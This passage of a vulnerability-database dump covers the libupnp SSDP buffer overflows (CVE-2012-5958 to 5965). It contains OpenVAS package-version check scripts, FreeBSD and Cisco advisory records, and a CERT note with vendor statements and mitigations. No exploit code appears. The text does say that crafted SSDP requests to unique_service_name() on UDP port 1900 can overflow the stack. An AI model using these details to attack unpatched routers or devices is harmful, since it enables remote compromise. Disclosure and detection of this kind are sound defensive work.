re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"libupnp on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:51:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Multiple stack-based buffer overflows were discovered in libupnp, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries where not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on libupnp\ncould generate a buffer overflow, overwriting the stack, leading to the daemon\ncrash and possible remote code execution.", "modified": "2017-07-07T00:00:00", "published": "2013-02-01T00:00:00", "id": "OPENVAS:892614", "href": "http://plugins.openvas.org/nasl.php?oid=892614", "type": "openvas", "title": "Debian Security Advisory DSA 2614-1 (libupnp - several vulnerabilities)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2614.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2614-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; 
either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"libupnp on Debian Linux\";\ntag_insight = \"The Portable SDK for UPnP Devices (libupnp) provides developers with an\nAPI and open source code for building control points, devices, and\nbridges that are compliant with Version 1.0 of the Universal Plug and\nPlay Device Architecture Specification\";\ntag_solution = \"For the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.6-5+squeeze1.\n\nFor the testing distribution (wheezy), these problems have been fixed in\nversion 1:1.6.17-1.2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.6.17-1.2.\n\nWe recommend that you upgrade your libupnp packages.\";\ntag_summary = \"Multiple stack-based buffer overflows were discovered in libupnp, a library\nused for handling the Universal Plug and Play protocol. 
HD Moore from Rapid7\ndiscovered that SSDP queries where not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on libupnp\ncould generate a buffer overflow, overwriting the stack, leading to the daemon\ncrash and possible remote code execution.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892614);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2012-5964\", \"CVE-2012-5962\", \"CVE-2012-5961\", \"CVE-2012-5959\", \"CVE-2012-5965\", \"CVE-2012-5963\", \"CVE-2012-5960\", \"CVE-2012-5958\");\n script_name(\"Debian Security Advisory DSA 2614-1 (libupnp - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-02-01 00:00:00 +0100 (Fri, 01 Feb 2013)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2614.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libupnp-dev\", ver:\"1:1.6.6-5+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp3\", ver:\"1:1.6.6-5+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp3-dbg\", ver:\"1:1.6.6-5+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp3-dev\", ver:\"1:1.6.6-5+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp-dev\", ver:\"1:1.6.17-1.2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp6\", ver:\"1:1.6.17-1.2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp6-dbg\", ver:\"1:1.6.17-1.2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp6-dev\", ver:\"1:1.6.17-1.2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp6-doc\", ver:\"1:1.6.17-1.2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "UPnP stack implementation format string vulnerability", "edition": 1, "modified": "2013-02-11T00:00:00", "published": "2013-02-11T00:00:00", "id": "SECURITYVULNS:VULN:12852", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12852", "title": "Broadcom chipset routers format string vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:41", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "\nProject changelog reports:\n\nThis patch addresses three possible buffer overflows in\n\t function unique_service_name(). The three issues have the\n\t following CVE numbers:\n\nCVE-2012-5958 Issue #2: Stack buffer overflow of Tempbuf\nCVE-2012-5959 Issue #4: Stack buffer overflow of Event->UDN\nCVE-2012-5960 Issue #8: Stack buffer overflow of Event->UDN\n\nNotice that the following issues have already been dealt with by\n\t previous work:\n\nCVE-2012-5961 Issue #1: Stack buffer overflow of Evt->UDN\nCVE-2012-5962 Issue #3: Stack buffer overflow of Evt->DeviceType\nCVE-2012-5963 Issue #5: Stack buffer overflow of Event->UDN\nCVE-2012-5964 Issue #6: Stack buffer overflow of Event->DeviceType\nCVE-2012-5965 Issue #7: Stack buffer overflow of Event->DeviceType\n\n\n", "edition": 4, "modified": "2012-11-21T00:00:00", "published": "2012-11-21T00:00:00", "id": "2EA6CE3D-6AFD-11E2-9D4E-BCAEC524BF84", "href": "https://vuxml.freebsd.org/freebsd/2ea6ce3d-6afd-11e2-9d4e-bcaec524bf84.html", "title": "upnp -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2020-12-24T11:41:54", "bulletinFamily": "software", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5961", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "The Portable Software Developer Kit (SDK) for Universal Plug-n-Play (UPnP) Devices contains a libupnp library, originally known as the Intel SDK for UPnP Devices, which is vulnerable to multiple stack-based buffer overflows when handling malicious Simple Service Discovery Protocol (SSDP) requests. 
This library is used in several vendor network devices, in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at http://www.kb.cert.org/vuls/id/922681 [\"http://www.kb.cert.org/vuls/id/922681\"].\n\nThe Portable Software Developer Kit (SDK) for Universal Plug-n-Play (UPnP) Devices contains a libupnp library, originally known as the Intel SDK for UPnP Devices, which is vulnerable to multiple stack-based buffer overflows when handling malicious Simple Service Discovery Protocol (SSDP) requests. This library is used in several vendor network devices, in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at http://www.kb.cert.org/vuls/id/922681[\"http://www.kb.cert.org/vuls/id/922681\"].\n\nCisco is currently evaluating products for possible exposure to these vulnerabilities. 
This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\"]", "modified": "2013-02-13T22:34:59", "published": "2013-01-29T20:00:00", "id": "CISCO-SA-20130129-UPNP", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp", "type": "cisco", "title": "Portable SDK for UPnP Devices Contains Buffer Overflow Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:52", "bulletinFamily": "info", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5961", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "### Overview \n\nThe Portable SDK for UPnP Devices `libupnp` library contains multiple buffer overflow vulnerabilities. Devices that use `libupnp` may also [accept UPnP queries over the WAN interface](<http://www.kb.cert.org/vuls/id/357851>), therefore exposing the vulnerabilities to the internet.\n\n### Description \n\nUniversal Plug and Play (UPnP) is a set of network protocols designed to support automatic discovery and service configuration. The Portable SDK for UPnP Devices (`libupnp`) is an open source project that has its roots in the Linux SDK for UPnP Devices and software from Intel (Intel Tools for UPnP Technologies and later Developer Tools for UPnP Technologies). Intel no longer maintains or supports these tools. Many different vendors produce UPnP-enabled devices that use `libupnp`.\n\nAs part of a large scale security research project, [Rapid7](<http://www.rapid7.com/>) investigated internet-connected UPnP devices and found, among other security issues, multiple buffer overflow vulnerabilities in the `libupnp` implementation of the Simple Service Discovery Protocol (SSDP). 
Rapid7's report summarizes these vulnerabilities: \n \n**_Portable SDK for UPnP Devices unique_service_name() Buffer Overflows_** \n \n_The libupnp library is vulnerable to multiple stack-based buffer overflows when handling malicious SSDP requests. This library is used by tens of millions of deployed network devices, of which approximately twenty million are exposed directly to the internet. In addition to network devices, many streaming media and file sharing applications are also exposed to attack through this library._ \n \n_This advisory does not address historic or current vulnerabilities in the HTTP and SOAP processing code of libupnp._ \n \n**_Affected Versions_** \n_Versions 1.2 (Intel SDK) and 1.2.1a - 1.8.0 (Portable SDK) are affected by at least three remotely exploitable buffer overflows in the unique_service_name() function, which is called to process incoming SSDP requests on UDP port 1900. Additionally, versions prior to 1.6.17 are vulnerable to additional issues in the same function. Please see Appendix A for a review of the vulnerable code by version._ \n \n**_Affected Vendors_** \n_Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected and a list of confirmed vendors and products is provided in Appendix B._ \n_ _ \nAdditional details may be found in a [paper](<https://community.rapid7.com/docs/DOC-2150>) and [advisory](<https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play>) from Rapid7.[](<https://community.rapid7.com/community/metasploit/blog/2013/01/29/upnp-considered-harmful>) \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code on the device or cause a denial of service. 
\n \n--- \n \n### Solution \n\n**Apply an Update** \n \n[libupnp 1.6.18](<http://pupnp.sourceforge.net/>) has been released to address these vulnerabilities. \n \n--- \n \n**Restrict Access** \n \nDeploy firewall rules to block untrusted hosts from being able to access port 1900/udp. \n \n**Disable UPnP** \n \nConsider disabling UPnP on the device if it is not absolutely necessary. \n \n--- \n \n### Vendor Information\n\nWe attempted to notify more than 200 vendors identified by Rapid7 as running `libupnp`. The following list includes vendors who responded to our notification and vendors for whom we had existing security contact information. \n \n--- \n \n922681\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Axis __ Affected\n\nNotified: December 13, 2012 Updated: April 05, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAxis products included version 1.6.17 (or earlier) of the libupnp library. UPnP is enabled by default and is mainly used for discovery and NAT configuration. All releases prior to 5.50.2 are affected by this vulnerability except for the AXIS P135x-series where the correction was released in the latest 5.40.19.\n\n### Vendor Information \n\nAll Axis products running firmware versions prior to 5.5x are potentially affected.\n\nAxis included the latest version 1.6.18 of UPnP in order to address the vulnerability and it will be available in release 5.50.2 or later. For prior releases, users are recommended to turn off UPnP (Available under System Options/Network/UPnP)\n\n### Cisco Systems, Inc. __ Affected\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCisco is investigating this issue for potential impact to Cisco and Linksys products. 
Please consult our public documents on this issue here: \n \nCisco's Security Advisory: <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp> \n \nLinksys Knowledge Base article: [http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341](<http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341>)\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp>\n * [http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341](<http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341>)\n\n### D-Link Systems, Inc. __ Affected\n\nNotified: December 13, 2012 Updated: January 31, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nJanuary 30, 2013 UPDATE:\n\nAt the current time D-Link deploys firmware that has UPnP feature support on our devices. The UPnP features are enabled by software developer kits - Intel, Portable, and miniUPnP. \n \nRecently, it has been discovered that the following UPnP versions may have a security vulnerability that could cause devices to become unstable, impair functionality, or disclose the services the devices offers (i.e. network camera feed): \n \nAll Versions of Intel SDK \nVersion of Portable SDK prior to V. 1.6.18 \nVersion of MiniUPnP SDK prior to V. 1.1 \n \nSecurity and performance is of the utmost importance to D-Link across all product lines, including networking, surveillance, storage and entertainment solutions. \n \nThe company is currently assessing the recent findings surrounding UPnP technology and whether any D-Link products are susceptible to vulnerabilities. 
If any action is needed, D-Link will provide information online at www.dlink.com/upnp \n\n### Vendor Information \n\nCustomers that want to disable UPnP in the affected products can do so by following these steps: \n \nCurrent Solution for Affected Products by Disabling UPnP \n \nStep 1: Log into device web configuration - For routers default URL \n \n<http://dlinkrouter.local> or <http://192.168.0.1> \n \nStep 2: Click on the Advanced tab at the top and then click on Advanced Network on the left-hand side. \nStep 3: Under the UPnP Settings section, uncheck the disabled UPnP buttons to disable UPnP on the device \nStep 4: Click Save Settings at the top to apply the settings. \n \n*** Please note that disabling UPnP might adversely affect features and capabilities of the device and/or supporting applications or devices connecting to these products. \n\n### Vendor References\n\n * <http://www.dlink.com/us/en/technology/upnp>\n\n### Fujitsu Technology Affected\n\nNotified: January 10, 2013 Updated: January 29, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Huawei Technologies Affected\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Linksys __ Affected\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCisco is investigating this issue for potential impact to Cisco and Linksys products. 
Please consult our public documents on this issue here: \n \nCisco's Security Advisory: <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp> \n \nLinksys Knowledge Base article: [http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341](<http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341>)\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp>\n * [http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341](<http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341>)\n\n### NEC Corporation Affected\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/secinfo/nv13-003.html>\n\n### Siemens __ Affected\n\nNotified: December 13, 2012 Updated: January 30, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nFrom SSA-963338:\n\n_Siemens OZW and OZS products use the UPnP network protocol for supporting specific localization functions. The 3rd party library libupnp [1] used for this protocol is vulnerable to multiple stack-based buffer overflows, as reported by CERT-CC [2]. These vulnerabilities allow DoS attacks and possibly remote code execution if the affected network ports are reachable by an attacker. Siemens plans to provide official permanent fixes with upcoming firmware updates and product replacements, and describes a temporary workaround below. _ \nThe full advisory can be found at the URL below. 
\n\n### Vendor References\n\n * <http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf>\n\n### Sony Corporation __ Affected\n\nNotified: December 13, 2012 Updated: January 30, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe following Sony products are affected by this vulnerability. Please access the links below for more details. \n \nMulti Channel AV Receiver : STR-DA3700ES, STR-DA5700ES \n \n[STR-DA5700ES] \nin USA: \n[http://esupport.sony.com/US/p/news-item.pl?mdl=STRDA5700ES&news_id=461](<http://esupport.sony.com/US/p/news-item.pl?mdl=STRDA5700ES&news_id=461>)\n\n \nin Canada: \n[http://esupport.sony.com/CA/p/news-item.pl?mdl=STRDA5700ES&news_id=461](<http://esupport.sony.com/CA/p/news-item.pl?mdl=STRDA5700ES&news_id=461>) \n \nin Europe(UK): \n<http://www.sony.co.uk/support/en/product/STR-DA5700ES/news/STR_DA_HN> \n \n[STR-DA3700ES] \nin USA: \n[http://esupport.sony.com/US/p/news-item.pl?mdl=STRDA3700ES&news_id=461](<http://esupport.sony.com/US/p/news-item.pl?mdl=STRDA3700ES&news_id=461>) \nin Canada: \n[http://esupport.sony.com/CA/p/news-item.pl?mdl=STRDA3700ES&news_id=461](<http://esupport.sony.com/CA/p/news-item.pl?mdl=STRDA3700ES&news_id=461>) \nin Europe(UK): \n<http://www.sony.co.uk/support/en/product/STR-DA3700ES/news/STR_DA_HN>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Synology __ Affected\n\nNotified: December 13, 2012 Updated: February 28, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSynology products employ version 1.6.6 of the libupnp library for the following features: Video Station, Audio Station, Media Server, Surveillance Station, and EZ-Internet (UPnP router discovery).\n\nAll versions of DSM prior to DSM 4.2 are affected by this vulnerability. 
However, the vulnerability issue will be resolved in the official release of DSM 4.2, planned in March 2013.\n\n### Vendor Information \n\nTo avoid being affected by this vulnerability, users are recommended to do the following: \n \n* Deploy firewall rules to block untrusted hosts from being able to access port 1900/UDP. \n* Update to DSM 4.2 when it is officially released. \n \nUsers could also consider turning off UPnP features for the following applications: \n \n* Video Station: Stop running Video Station. \n* Audio Station: Turn off UPnP in the settings. \n* Media Server: Stop running Media Server. \n* EZ-Internet: Do not configure routers with EZ-Internet. \n* Surveillance: Do not add IP cameras by searching IP cams on LAN in Surveillance Station.\n\n### ipitomy __ Affected\n\nNotified: January 08, 2013 Updated: February 01, 2013 \n\n**Statement Date: January 31, 2013**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nIPitomy Communications\n\nResponse to CERT VU#922681 \n1/31/2013 \n \n**Summary** \n \nThe Software Developer Kit (SDK) for Universal Plug-n-Play (UPnP) Devices contains a library originally developed as the Intel SDK for UPnP Devices. Multiple stack-based buffer overflow vulnerabilities have been found in the popular versions of this library used on many network vendor devices. For more information on this vulnerability please visit: <http://www.kb.cert.org/vuls/id/922681> \n \n**Affected Products** \n \nIPitomy has not confirmed the vulnerability yet and is still investigating. However we are listing below the only products that could be affected as well as the recommended steps to prevent any potential exploitation of these vulnerabilities. \n \n**IP1000 and IP1000v2** \n \nThese products contain an affected version of the UPnP library. IPitomy recommends disabling UPnP permanently on these products. \nThis product defaults the UPnP setting to \u201con\u201d. 
\nNote we have scanned the IP1000 products from the WAN side and have determined that with the UPnP service on, the systems do not respond to UPnP requests from the WAN, therefore exploitation of these UPnP vulnerabilities would have to occur from the LAN side of the device. \n \n**IPR20** \n \nIPR20 contains router functionality. The UPnP service is disabled by default on these devices. IPitomy recommends that you ensure that UPnP service is disabled. \nIPitomy has confirmed that if UPnP service is enabled the device does not respond to UPnP requests on the WAN interface, therefore exploitation of these UPnP vulnerabilities would have to occur through the LAN side of the device. \nProperly installed (IPR20 WAN port connected to customer LAN), devices should not present these vulnerabilities.\n\n### Vendor References\n\n * <http://www.ipitomy.com/index.php/mi-security-notice-ip001>\n\n### Ubiquiti Networks Not Affected\n\nNotified: January 09, 2013 Updated: January 29, 2013 \n\n**Statement Date: January 10, 2013**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Yamaha Corporation Not Affected\n\nUpdated: February 01, 2013 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### teldat __ Not Affected\n\nUpdated: February 05, 2013 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n\\-------------------------\n\n| Teldat Security Bulletin | \n\\------------------------- \n \nBulletin ID: 2013-02-04 \nRevision: 1.0 \n \nTitle: \nPortable SDK for UPnP Devices (libupnp) contains multiple buffer overflows in SSDP \n(US-CERT Vulnerability Note VU#922681) \n \nSummary: \nUS-CERT Note VU#922681 describes that the \"Portable SDK for 
UPnP Devices libupnp\" library contains multiple buffer overflow vulnerabilities. Devices that use \"libupnp\" may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. A remote, unauthenticated attacker may be able to execute arbitrary code on the device or cause a denial of service. \n \nDetails can be found at <http://www.kb.cert.org/vuls/id/922681> and <https://community.rapid7.com/docs/DOC-2150> \n \nComment: \nThe UPnP implementation used in the BOSS operating system is a proprietary solution developed by Teldat, and no Teldat product running the BOSS operating system is affected. Note that products sold under the former company name of \"Funkwerk Enterprise Communications\" - if running the BOSS operating system - are equally not affected by this vulnerability. \n \nCopyright (c) 2013, Teldat GmbH. All Rights Reserved \n \n\\----- End Security Bulletin 2013-02-04 -----\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.teldat.org/download/en/products/security_bulletin/security_bulletin_2013-02-05_advisory.txt>\n\n### 3com Inc Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Belkin, Inc. 
Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### EMC Corporation Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Geexbox Unknown\n\nNotified: January 11, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intel Corporation Unknown\n\nNotified: February 01, 2013 Updated: February 01, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Koukaam Unknown\n\nNotified: January 10, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Logitech Unknown\n\nNotified: January 04, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Motorola, Inc. 
Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Netgear, Inc. Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Pantech North America Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: December 04, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SFR Unknown\n\nNotified: January 04, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SMC Networks, Inc. 
